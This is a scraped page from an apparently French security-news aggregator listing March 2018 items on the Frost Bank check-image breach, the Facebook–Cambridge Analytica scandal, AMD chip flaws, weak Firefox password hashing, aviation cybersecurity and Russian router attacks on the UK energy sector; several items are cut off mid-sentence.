campaign. Facebook said | Yahoo | ||
|
2018-03-19 18:35:00 | Frost Bank Says Data Breach Exposed Check Images (lien direct) | Frost Bank, a subsidiary of Cullen/Frost Bankers, Inc., announced on Friday that it discovered the unauthorized access to images of checks stored electronically. According to the company, it discovered last week that a third-party lockbox software program had been compromised, resulting in unauthorized users being able to view and copy images of checks stored electronically in the image archive. Frost Bank systems weren't impacted in the incident, Frost says. Customers can use lockbox services to send payments to a central post office box. The bank receives the payments and credits them directly to a business's account. The information that was accessed as part of the incident could be used to forge checks, the company says. The company says it stopped the identified unauthorized access immediately after discovering it, and that it also launched an investigation into the matter. Frost says it is working with an unnamed cybersecurity firm to investigate the incident and that the law-enforcement authorities have been informed as well. “At Frost, we care deeply about taking care of our customers and protecting their information, and we regret that this situation has occurred. We are working very hard to make things right,” Frost Chairman and CEO Phil Green said in a statement. | |||
|
2018-03-19 18:07:00 | Facebook Rocked by New Data Breach Scandal (lien direct) | Facebook shares plunged Monday following revelations that a firm working for Donald Trump's presidential campaign harvested data on 50 million users, as analysts warned the social media giant's business model could be at risk. Calls for investigations came on both sides of the Atlantic after Facebook responded to the explosive reports of misuse of its data by suspending the account of Cambridge Analytica, a British communications firm hired by Trump's 2016 campaign. "This is a major breach that must be investigated. It's clear these platforms can't police themselves," Democratic Senator Amy Klobuchar said on Twitter. Expressing "serious concern regarding recent reports that data from millions of Americans was misused in order to influence voters," Klobuchar and Republican Senator John Kennedy called for Facebook chief Mark Zuckerberg and other top executives to appear before Congress, along with the CEOs of Google and Twitter. In Europe, officials voiced similar outrage. Vera Jourova, European Commissioner for Justice, Consumers and Gender Equality, called the revelations "horrifying, if confirmed," and vowed to address her concerns while travelling to the United States this week. In Britain, parliamentary committee chair Damian Collins said both Cambridge Analytica and Facebook had questions to answer following what appears to be a giant data breach, carried out in an attempt to influence voters' choices at the ballot box. "We have repeatedly asked Facebook about how companies acquire and hold on to user data from their site, and in particular whether data had been taken from people without their consent," Collins said in a statement. "Their answers have consistently understated this risk, and have also been misleading to the committee." 'Systemic problems' On Wall Street, Facebook shares skidded 7.7 percent in midday trade amid concerns about pressure for new regulations that could hurt its business model. Brian Wieser at Pivotal Research said the revelations highlight "systemic problems at Facebook," but that they won't immediately impact Facebook revenues. Still he said "risks are now enhanced" because of the potential for regulations on how Facebook uses data for advertising and monitoring users. According to a joint investigation by The New York Times and Britain's Observer, Cambridge Analytica was able to create psychological profiles on 50 million Facebook users through the use of a personalit | Guideline | ||
|
2018-03-19 17:23:03 | (Déjà vu) AMD Chip Flaws Confirmed by More Researchers (lien direct) | Another cybersecurity firm has independently confirmed some of the AMD processor vulnerabilities discovered by Israel-based CTS Labs, but the controversial disclosure has not had a significant impact on the value of the chip giant's stock. CTS Labs last week published a brief description of 13 allegedly critical vulnerabilities and backdoors found in EPYC and Ryzen processors from AMD. The company says the flaws can be exploited for arbitrary code execution, bypassing security features (e.g. Windows Defender Credential Guard, Secure Boot), stealing data, helping malware become resilient against security products, and damaging hardware. The flaws have been dubbed MASTERKEY, RYZENFALL, FALLOUT and CHIMERA, and exploiting them requires elevated privileges to the targeted machine - physical access is not required. The security firm will not disclose technical details any time soon in order to prevent abuse. CTS Labs, which no one heard of until last week, came under fire shortly after its disclosure for giving AMD only a 24-hour notice before going public with its findings, and for apparently attempting to short AMD stock. The company later made some clarifications regarding the flaws and its disclosure method. While initially many doubted CTS Labs' claims due to the lack of technical information, an increasing number of independent researchers have confirmed that the vulnerabilities do in fact exist. Nevertheless, there are still many industry professionals who believe their severity has been greatly exaggerated. Trail of Bits was the first to independently review the findings. The company, which has been paid for its services, has confirmed that the proof-of-concept (PoC) exploits developed by CTS Labs work as intended, but believes that there is “no immediate risk of exploitation of these vulnerabilities for most users.” “Even if the full details were published today, attackers would need to invest significant development efforts to build attack tools that utilize these vulnerabilities. This level of effort is beyond the reach of most attackers,” Trail of Bits said in a blog post. On Monday, Check Point also confirmed two of the RYZENFALL vulnerabilities following its own review. The security firm says it does not have any relationship with CTS Labs and it has not received any payment for its services. It also noted that it does not agree with the way CTS disclosed its findings, describing it as “very irresponsible.” “In our opinion the original CTS Labs report might have been problematically phrased in a way that misrepresented the threat model and impact that the RYZENFALL-1 and RYZENFALL-3 vulnerabilities present,” Check Point said in a blog post. “However, p | |||
|
2018-03-19 17:07:05 | Firefox Fails at Keeping Passwords Secure, Developer Claims (lien direct) | Recovering Encrypted Firefox Passwords via Brute Force Attacks is Easy, Developer Says Firefox does a poor job at securing stored passwords even if the user has set up a master password, a software developer claims. According to Wladimir Palant, author of the popular Adblock Plus extension, the password manager in Firefox and Thunderbird needs some major improvements in terms of security. The manager can spill out passwords in less than a minute, he says. The issue, Palant claims, resides in the manner in which the manager converts a password into an encryption key. The operation is performed by the sftkdb_passwordToKey() function, which applies SHA-1 hashing to a string consisting of a random salt and the actual master password. In the current implementation, the SHA-1 function has a very low iteration count of 1, meaning that it falls way behind what's considered a minimum value in practice, namely 10,000. In fact, an iteration count of at least 1,000 was considered “modest” decades ago | |||
|
2018-03-19 16:02:05 | (Déjà vu) F-Secure Looks to Address Cyber Security Risks in Aviation Industry (lien direct) | 
Aviation, as part of the transportation sector, falls within the critical infrastructure. While it may not have the same security issues as ICS/SCADA-based manufacturing and utilities, it has certain conceptual similarities; including, for example, a vital operational technology infrastructure with increasing internet connectivity, and the associated cyber risks.
It also has one major difference -- the close physical proximity of its own customers. Catastrophic failure in the aviation industry has a more immediate and dramatic effect on customers -- and for this reason alone, a trusted brand image is an essential and fragile part of success in the aviation industry. Without customer trust, customers will not fly with a particular airline.
Historically, aviation security has primarily focused on physical safety, and has become highly efficient in this area. But in recent years, the customization of new aircraft to provide newer and unique passenger experiences -- such as the latest in internet-connected in-flight entertainment systems -- has added a new cyber risk.
Matthieu Gualino, deputy director of the International Civil Aviation Organization Aviation Security Training Center, described the three current areas of cyber risk as flight control (the critical systems needed to fly the aircraft -- high impact, low likelihood); the operational cabin (systems used to operate and maintain aircraft -- medium impact, medium likelihood); and passengers (systems with direct passenger interaction -- low impact, high likelihood).
The problem today is that aviation security is experienced in operational technology, security and safety; but less experienced in the rapidly evolving world of cyber security. To help counter this risk, Finland's F-Secure has launched its new Aviation Cyber Security Services to help secure not just aircraft, but the entire aviation industry: aircraft, infrastructure, data, and -- most importantly to F-Secure -- reputation. Customers are unlikely to fly with companies they do not trust; and successful cyber-attacks rapidly eliminate customer trust and confidence; even, suggests F-Secure, a minor breach of something like an in-flight entertainment system.
"Off-the-shelf communication technologies are finding their way into aircraft, which makes security much more complicated than in the past," said Hugo Teso, head of aviation cybersecurity services at F-Secure and a former pilot. "Because these off-the-shelf technologies weren't necessarily created to meet the rigorous safety requirements of airlines, the aviation industry is making cyber security a top priority. But they need a partner that understands both cyber security and the details of airline operations, because it's an industry where those details make a big difference."
The new service integrates security assessments of avionics, ground systems and data links, vulnerability scanners, security monitoring, incident response services, and specialized cyber security training for staff. |
|||
|
2018-03-19 15:14:03 | (Déjà vu) Cambridge Analytica: Firm at the Heart of Facebook Scandal (lien direct) | At the center of a scandal over alleged misuse of Facebook users' personal data, Cambridge Analytica is a communications firm hired by those behind Donald Trump's successful US presidential bid.
An affiliate of British firm Strategic Communication Laboratories (SCL), Cambridge Analytica has offices in London, New York, Washington, as well as Brazil and Malaysia.
Here's the story behind the company using data to fuel political campaigns:
What does Cambridge Analytica do?
The company boasts it can "find your voters and move them to action" through data-driven campaigns and a team including data scientists and behavioural psychologists.
 "Within the United States alone, we have played a pivotal role in winning presidential races as well as congressional and state elections," with data on more than 230 million American voters, Cambridge Analytica claims on its website.
Speaking to TechCrunch in 2017, CEO Alexander Nix said the firm was "always acquiring more" data. "Every day we have teams looking for new data sets," he told the site.
Who are the company's clients?
As well as working on the election which saw Trump reach the White House, Cambridge Analytica has been involved in political campaigns around the world.
In the US, analysts harnessed data to generate thousands of messages targeting voters through their profiles on social media such as Facebook, Snapchat, or the Pandora Radio streaming service.
British press have credited Cambridge Analytica with providing services to pro-Brexit campaign Leave.EU, but Nix has denied working for the group.
Globally, Cambridge Analytica said it has worked in Italy, Kenya, South Africa, Colombia and Indonesia.
|
★★★★ | ||
|
2018-03-19 13:51:04 | (Déjà vu) Russian Cyberspies Hacked Routers in Energy Sector Attacks (lien direct) | A cyberespionage group believed to be operating out of Russia hijacked a Cisco router and abused it to obtain credentials that were later leveraged in attacks targeting energy companies in the United Kingdom, endpoint security firm Cylance reported on Friday. The United States last week announced sanctions against Russian spy agencies and more than a dozen individuals for trying to influence the 2016 presidential election and launching cyberattacks, including the NotPetya attack and campaigns targeting energy firms. Shortly after, US-CERT updated an alert from the DHS and FBI to officially accuse the Russian government of being responsible for critical infrastructure attacks launched by a threat actor tracked as Dragonfly, Crouching Yeti and Energetic Bear. A warning issued last year by the UK's National Cyber Security Centre (NCSC) revealed that hackers had targeted the country's energy sector, abusing the Server Message Block (SMB) protocol and attempting to harvest victims' passwords. An investigation conducted by Cylance showed that the attacks were likely carried out by the Dragonfly group. The security firm has observed a series of phishing attacks aimed at the energy sector in the UK using two documents claiming to be resumes belonging to one Jacob Morrison. When opened, the documents fetched a template file and attempted to automatically authenticate to a remote SMB server controlled by the attackers. This template injection technique was detailed last year by Cisco Talos following Dragonfly attacks on critical infrastructure organizations in the United States. When a malicious document is opened using Microsoft Word, it loads a template file from the attacker's SMB server. When the targeted device connects to the SMB server, it will attempt to authenticate using the current Windows user's domain credentials, basically handing them over to the attackers. In a separate analysis of such attacks, Cylance noted that while the credentials will in most cases be encrypted, even an unsophisticated attacker will be able to recover them in a few hours or days, depending on their resources. According to Cylance, Dragonfly used this technique to harvest credentials that were later likely used to hack the systems of energy sector organizations in the United Kingdom. One interesting aspect noticed by Cylance researchers is that the IP address of the SMB server used in the template injection attack was associated with a major state-owned energy congl | NotPetya |
To see everything:
Our RSS (filtrered)
